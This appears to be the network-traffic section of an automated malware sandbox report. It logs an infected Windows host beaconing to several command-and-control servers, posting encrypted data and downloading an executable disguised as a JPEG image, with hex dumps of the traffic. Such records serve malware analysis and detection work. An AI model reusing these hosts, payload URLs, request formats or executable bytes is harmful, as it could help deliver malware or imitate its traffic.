                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    19192.168.2.349763109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:50.945847034 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://rpsveofbatbep.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:50.945921898 CET267OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4b 2d ee fc
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vuK-Bybaq*R]P+`qUC8\]x6V(Wm4V oK(<Ty)e\yJRQp.oQt`Q{`csA:-k
                                                                                                                                                                    Feb 8, 2024 19:09:51.366741896 CET293INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:51 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 47
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 7c 06 6d 50 fb 3c 44 f8 f7 4a bc 8b f2 a6 2d 95 2a c6 b7 2f 55 12 83 d9 c1 c4 74 d3
                                                                                                                                                                    Data Ascii: #\|mP<DJ-*/Ut


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    20192.168.2.349764211.168.53.11080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:51.752690077 CET165OUTGET /uploads/logo3.jpg HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: emgvod.com
                                                                                                                                                                    Feb 8, 2024 19:09:52.585036039 CET239INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.24.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:52 GMT
                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                    Content-Length: 979456
                                                                                                                                                                    Last-Modified: Wed, 07 Feb 2024 22:44:14 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    ETag: "65c407be-ef200"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Feb 8, 2024 19:09:52.585062027 CET1286INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELe @ ``
                                                                                                                                                                    Feb 8, 2024 19:09:52.892030954 CET1286INData Raw: 00 0a 6f f4 02 00 06 06 17 6f f0 02 00 06 06 2a 00 00 13 30 1c 00 7e 01 00 00 09 00 00 11 14 0d 14 13 04 73 1d 00 00 06 0a 06 73 eb 02 00 06 7d 03 00 00 04 02 28 3d 00 00 0a 28 3e 00 00 0a 0c 03 28 3d 00 00 0a 28 3e 00 00 0a 0b 02 03 30 0d 04 16
                                                                                                                                                                    Data Ascii: oo*0~ss}(=(>(=(>01o?1s@z0o?+sAo?+0oB&X2o,&o-sAo?+0oB&X2o,&o-sC{
                                                                                                                                                                    Feb 8, 2024 19:09:52.892149925 CET1286INData Raw: 02 00 06 a2 07 17 06 17 59 d1 8c 14 00 00 01 a2 07 18 20 aa 92 04 53 28 25 02 00 06 a2 07 19 02 6f 3f 00 00 0a 03 59 17 59 8c 5a 00 00 01 a2 07 1a 20 99 92 04 53 28 25 02 00 06 a2 07 28 4d 00 00 0a 6f 2c 00 00 0a 26 04 06 6f 42 00 00 0a 26 02 03
                                                                                                                                                                    Data Ascii: Y S(%o?YYZ S(%(Mo,&oB&X()oB&*0c+XXo?/oJ0. S(%s*oL( S(%o,&o-s((*0(oB&o?/x
                                                                                                                                                                    Feb 8, 2024 19:09:52.892193079 CET1286INData Raw: 27 00 00 1b 11 04 14 6f 5f 00 00 0a 06 6f 06 00 00 0a 2d d9 de 0a 06 2c 06 06 6f 09 00 00 0a dc 02 03 8c 27 00 00 1b 28 60 00 00 0a 6f 61 00 00 0a 0b 2b 1e 07 6f 62 00 00 0a 0d 04 09 6f 48 01 00 06 13 05 09 03 8c 27 00 00 1b 11 05 6f 63 00 00 0a
                                                                                                                                                                    Data Ascii: 'o_o-,o'(`oa+oboH'oco-,o*=+h*0isd}e{e- S(%s4z{e(\fsg(+,*{e(`isj(
                                                                                                                                                                    Feb 8, 2024 19:09:53.199318886 CET1286INData Raw: a1 00 00 0a 6f 14 00 00 2b 2a 00 00 3a 02 28 27 00 00 0a 02 03 7d 0f 00 00 04 2a 00 03 30 26 00 20 01 00 00 00 00 00 00 02 7b 0f 00 00 04 2c 67 03 6f 2d 03 00 06 04 6f 2d 03 00 06 28 9c 04 00 06 2c 54 03 6f 2d 03 00 06 14 28 9b 04 00 06 2c 02 15
                                                                                                                                                                    Data Ascii: o+*:('}*0& {,go-o-(,To-(,*o-(,*o-oo-o/*o-oo-o1*o+o+/*o+o+1*o,o,1*o,o,/*{-go-o-(,T
                                                                                                                                                                    Feb 8, 2024 19:09:53.199364901 CET1286INData Raw: 02 15 7d 1b 00 00 04 02 7e 19 00 00 04 2d 11 14 fe 06 70 00 00 06 73 bc 00 00 0a 80 19 00 00 04 7e 19 00 00 04 73 c0 01 00 06 7d 1a 00 00 04 02 17 7d 1b 00 00 04 17 2a 02 15 7d 1b 00 00 04 02 73 d4 04 00 06 7d 1a 00 00 04 02 18 7d 1b 00 00 04 17
                                                                                                                                                                    Data Ascii: }~-ps~s}}*}s}}*}s}}*}s}}*}s}}*}s}}*}s}}*}(sT}
                                                                                                                                                                    Feb 8, 2024 19:09:53.199403048 CET1286INData Raw: 00 04 0b 07 2c 0e 07 17 3b 91 00 00 00 16 0a dd cd 00 00 00 02 15 7d 2a 00 00 04 02 1d 7d 2f 00 00 04 02 02 7b 2d 00 00 04 13 04 1f fe 73 77 00 00 06 25 11 04 7d 21 00 00 04 6f 0c 00 00 0a 7d 30 00 00 04 02 1f fd 7d 2a 00 00 04 2b 64 02 7b 30 00
                                                                                                                                                                    Data Ascii: ,;}*}/{-sw%}!o}0}*+d{0o{-a_- wa{/Y}/_- Da}+}*C}*{/-+{0o-(+(}0(*
                                                                                                                                                                    Feb 8, 2024 19:09:53.199444056 CET1286INData Raw: 00 00 1b 30 06 00 66 00 00 00 2a 00 00 11 03 2d 06 73 4d 01 00 06 2a 04 2d 10 20 21 80 04 53 28 25 02 00 06 73 34 00 00 0a 7a 03 75 2b 00 00 02 0a 06 2d 07 03 73 4e 01 00 06 2a 04 06 6f c2 00 00 06 6f 48 01 00 06 75 50 00 00 01 0b 07 2d 07 03 73
                                                                                                                                                                    Data Ascii: 0f*-sM*- !S(%s4zu+-sN*ooHuP-sN*(&sN{<**IS]0+{;%(otPotP{<,:{<o0+{<o1{<Z(}<
                                                                                                                                                                    Feb 8, 2024 19:09:53.357342005 CET1286INData Raw: 6f f2 00 00 0a 16 32 1a 20 b3 85 04 53 28 25 02 00 06 20 c4 85 04 53 28 25 02 00 06 73 12 01 00 0a 7a 02 03 7d 45 00 00 04 02 04 7d 46 00 00 04 02 05 7d 47 00 00 04 2a 1e 02 7b 45 00 00 04 2a 1e 02 7b 46 00 00 04 2a 1e 02 7b 47 00 00 04 2a 13 30
                                                                                                                                                                    Data Ascii: o2 S(% S(%sz}E}F}G*{E*{F*{G*00u+,(*(s*0$(o(oa(oa*0:-*(o3%(o(,(o(**(
                                                                                                                                                                    Feb 8, 2024 19:09:53.357414007 CET1286INData Raw: 04 8c 5a 00 00 01 28 23 01 00 0a 73 24 01 00 0a 7a 02 06 7b 60 00 00 04 7d 60 00 00 04 02 06 7b 5d 00 00 04 7d 5d 00 00 04 02 06 7b 5e 00 00 04 7d 5e 00 00 04 02 06 7b 64 00 00 04 7d 64 00 00 04 02 06 7b 5b 00 00 04 7d 5b 00 00 04 02 06 7b 62 00
                                                                                                                                                                    Data Ascii: Z(#s$z{`}`{]}]{^}^{d}d{[}[{b}b{a}a{\}\{_}_{e}e}Q*STUVW X Y**(**(**(**(


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    21192.168.2.3497655.42.64.33804048C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:51.828824043 CET139OUTGET /ping.php?substr=four HTTP/1.1
                                                                                                                                                                    User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                    Host: 5.42.64.33
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Feb 8, 2024 19:09:52.040096045 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-Powered-By: Express
                                                                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Content-Length: 147
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:51 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Keep-Alive: timeout=5
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    22192.168.2.349766185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:53.689636946 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:53.936813116 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    23192.168.2.349767185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:54.596549034 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:54.833590031 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    24192.168.2.349768185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:55.261899948 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:55.498778105 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    25192.168.2.349769109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:55.827296972 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://sickppoeilk.com/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 313
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:55.827323914 CET313OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 35 39 b3 93
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA ,[k,vu59ZeZEiD|&X-[5e8b[[>L3g",'*eSeIfL %?px8D= ^}%)2
                                                                                                                                                                    Feb 8, 2024 19:09:56.317465067 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:56 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    26192.168.2.349770185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:55.919754028 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:56.157049894 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    27192.168.2.349771185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:56.577588081 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:56.815769911 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    28192.168.2.349772185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:57.172585011 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:57.409459114 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:57 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    29192.168.2.349773185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:58.342757940 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:58.579130888 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    30192.168.2.349774185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:58.984344959 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:59.220973969 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    31192.168.2.349775185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:59.655677080 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:09:59.892448902 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
